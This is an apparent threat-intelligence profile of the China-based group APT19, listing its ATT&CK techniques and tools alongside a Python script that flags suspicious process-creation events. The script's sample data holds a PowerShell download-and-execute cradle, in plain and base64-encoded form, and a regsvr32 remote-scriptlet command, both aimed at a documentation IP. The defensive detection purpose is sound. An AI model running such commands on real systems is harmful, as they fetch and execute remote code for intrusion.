APT19
Also known as: Codoso · C0d0so0 · Codoso Team · Sunshop Group
Overview
APT19 is a China-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017 it ran a phishing campaign against seven law and investment firms. Some analysts track APT19 and Deep Panda as the same group, but open-source reporting does not settle whether they are.
Targets
Finance · Military · Non-profit Organisation · Private sector · Technology
Regions
United States
TTPs — 21 techniques across 8 tactics (18 are listed below; the Discovery entry carries no techniques on this page)
Resource Development
- T1588.002 Obtain Capabilities: Tool
Initial Access
- T1189 Drive-by Compromise
- T1566.001 Phishing: Spearphishing Attachment
Execution
- T1059 Command and Scripting Interpreter
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1204.002 User Execution: Malicious File
Persistence
- T1543.003 Create or Modify System Process: Windows Service
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Stealth
- T1027.010 Obfuscated Files or Information: Command Obfuscation
- T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
- T1140 Deobfuscate/Decode Files or Information
- T1218.010 System Binary Proxy Execution: Regsvr32
- T1218.011 System Binary Proxy Execution: Rundll32
- T1564.003 Hide Artifacts: Hidden Window
- T1574.001 Hijack Execution Flow: DLL
Defense Impairment
- T1112 Modify Registry
Discovery
- (no techniques listed)
Command and Control
- T1071.001 Application Layer Protocol: Web Protocols
- T1132.001 Data Encoding: Standard Encoding
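The execution-chain entries above (an Office document that launches PowerShell, a hidden window, a base64 -EncodedCommand that unpacks to a download cradle, and Regsvr32/Rundll32 proxying a DLL) are the part of this profile a detection engineer can act on from process-creation telemetry. The script below is an added example, not code from threatfilter.dev or from any of the reports listed on this page: it triages Sysmon Event ID 1 / Security 4688 style records and tags each with the technique IDs it evidences. The events are constructed for the example, 198.51.100.7 is a documentation (TEST-NET-2) address, and the command-line patterns follow the ATT&CK technique descriptions rather than any command line attributed to APT19.

```python
"""Triage of process-creation records for the execution-chain techniques
listed above. Added example; the events are constructed, not real logs.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\",
                 "%temp%", "%appdata%", "%localappdata%")
# Fragments that turn powershell.exe into a download-and-run stager.
CRADLE_MARKERS = ("net.webclient", "downloadstring", "invoke-webrequest",
                  "invoke-expression", "iex ", "frombase64string")
# PowerShell accepts any unambiguous prefix of -EncodedCommand / -WindowStyle;
# these are the spellings that show up in command lines most often.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
REGSVR_URL_RE = re.compile(r"/i:\s*(?:https?|ftp)://", re.I)
DLL_ARG_RE = re.compile(r'"([^"]+?\.(?:dll|ocx))"|(\S+?\.(?:dll|ocx))\b', re.I)


@dataclass(frozen=True)
class Finding:
    technique: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return re.split(r"[\\/]", path.lower())[-1]


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def dll_argument(command_line: str) -> Optional[str]:
    """First .dll/.ocx argument handed to rundll32/regsvr32, lower-cased."""
    m = DLL_ARG_RE.search(command_line)
    return (m.group(1) or m.group(2)).lower() if m else None


def analyze_process_event(event: dict) -> list[Finding]:
    """Map one process-creation record to the techniques it evidences."""
    findings: list[Finding] = []
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"]
    low = cmd.lower()
    # An Office parent spawning a script host is the macro-to-payload hop.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(Finding("T1204.002", f"{parent} spawned {image}"))
    if image == "powershell.exe":
        if HIDDEN_RE.search(cmd):
            findings.append(Finding("T1564.003", "hidden PowerShell window"))
        script = decode_encoded_command(cmd)
        if script is not None:
            findings.append(Finding("T1027.010", "-EncodedCommand: " + script[:60]))
            low = script.lower()  # inspect the unwrapped script, not the wrapper
        if any(marker in low for marker in CRADLE_MARKERS):
            findings.append(Finding("T1059.001", "download cradle / in-memory run"))
    if image in {"regsvr32.exe", "rundll32.exe"}:
        dll = dll_argument(cmd)
        if image == "regsvr32.exe" and (REGSVR_URL_RE.search(cmd) or "scrobj.dll" in low):
            findings.append(Finding("T1218.010", "regsvr32 fetching a remote scriptlet"))
        elif dll and dll.startswith(USER_WRITABLE):
            tid = "T1218.011" if image == "rundll32.exe" else "T1218.010"
            findings.append(Finding(tid, f"{image} loading {dll} from a user-writable path"))
    return findings


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Technique IDs per event id, for events with at least one finding."""
    report: dict[str, list[str]] = {}
    for ev in events:
        hits = analyze_process_event(ev)
        if hits:
            report[ev["id"]] = [f.technique for f in hits]
    return report


def event(eid: str, parent: str, image: str, cmd: str) -> dict:
    return {"id": eid, "parent_image": parent, "image": image, "command_line": cmd}


# Constructed sample telemetry (not taken from any real incident).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    event("macro-ps", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
          f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {ENCODED_STAGER}"),
    event("regsvr32-sct", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
          "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
    event("rundll32-user-dll", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Users\Public\Libraries\upd.dll,Start"),
    event("admin-ps", r"C:\Windows\explorer.exe", PS,
          r"powershell.exe -NoProfile -File C:\Scripts\Get-Inventory.ps1"),
    event("rundll32-system", r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
          r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for event_id, techniques in triage(SAMPLE_EVENTS).items():
        print(f"{event_id}: {', '.join(techniques)}")
```

Feed it Sysmon ParentImage/Image/CommandLine or 4688 fields (4688 only carries the command line when process command-line auditing is enabled). Two caveats: -EncodedCommand and hidden windows are common in legitimate automation, so the parent lineage (the T1204.002 hit) is what turns the other tags into an alert rather than noise; and the persistence entries in this profile (T1547.001, T1543.003, T1112) are better hunted from registry-write events (Sysmon Event ID 12/13) than from process creation, which this script does not cover.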
Tools & malware (2)
Cobalt Strike · Empire
Reporting (3)
- Ahl, I. (2017). Privileges and Credentials: Phished at the Request of Counsel. FireEye.
- Scott, J. and Spaniel, D. (2016). ICIT Brief: China's Espionage Dynasty, Economic Death by a Thousand Cuts. Institute for Critical Infrastructure Technology.
- Grunzweig, J. and Lee, B. (2016). New Attacks Linked to C0d0so0 Group. Palo Alto Networks Unit 42.